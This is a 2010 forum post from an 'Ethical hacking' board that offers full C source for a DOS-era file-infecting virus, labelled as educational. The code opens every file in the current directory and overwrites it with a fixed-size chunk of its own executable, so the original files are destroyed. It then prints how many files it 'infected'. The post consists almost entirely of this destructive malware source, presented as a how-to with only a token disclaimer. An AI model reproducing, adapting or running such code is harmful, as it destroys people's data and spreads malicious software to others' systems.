How to make a virus using c

Discussion in 'Ethical hacking' started by VISHAL SINGH, Dec 13, 2010.

  1. VISHAL SINGH

    VISHAL SINGH New Member

    Joined:
    Dec 3, 2010
    Messages:
    10
    Likes Received:
    0
    Trophy Points:
    0
    Occupation:
    student
    Location:
    sonipat
    Home Page:
    http://www.sujapur.webs.com
    Hello my self vishal singh,an ethical hacker.on today i larn u hw u make an virus in system .
    note-that is for educational pruposes not for spread in ur friend system.
    to make this virus in ur system u open c compiler in ur system and type

    Code:
    #include<stdio.h>
    #include<io.h>
    #include<dos.h>
    #include<dir.h>
    #include<conio.h>
    #include<time.h>
    
    FILE *virus,*host;
    int done,a=0;
    unsigned long x;
    char buff[2048];
    struct ffblk ffblk;
    clock_t st,end;
    
    void main()
    {
    	st=clock();
    	clrscr();
    	done=findfirst(“*.*”,&ffblk,0);
    	while(!done)
    	{
    		virus=fopen(_argv[0],”rb”);
    		host=fopen(ffblk.ff_name,”rb+”);
    		if(host==NULL) goto next;
    		x=89088;
    		printf(“Infecting %s\n”,ffblk.ff_name,a);
    		while(x>2048)
    		{
    			fread(buff,2048,1,virus);
    			fwrite(buff,2048,1,host);
    			x-=2048;
    		}
    		fread(buff,x,1,virus);
    		fwrite(buff,x,1,host);
    		a++;
    		next:
    		{
    			fcloseall();
    			done=findnext(&ffblk);
    		}
    	}
    	printf(“DONE! (Total Files Infected= %d)”,a);
    	end=clock();
    	printf(“TIME TAKEN=%f SEC\n”,
    	(end-st)/CLK_TCK);
    	getch();
    }
    :crazy:
     
    Last edited by a moderator: Dec 14, 2010

Share This Page

  1. This site uses cookies to help personalise content, tailor your experience and to keep you logged in if you register.
    By continuing to use this site, you are consenting to our use of cookies.
    Dismiss Notice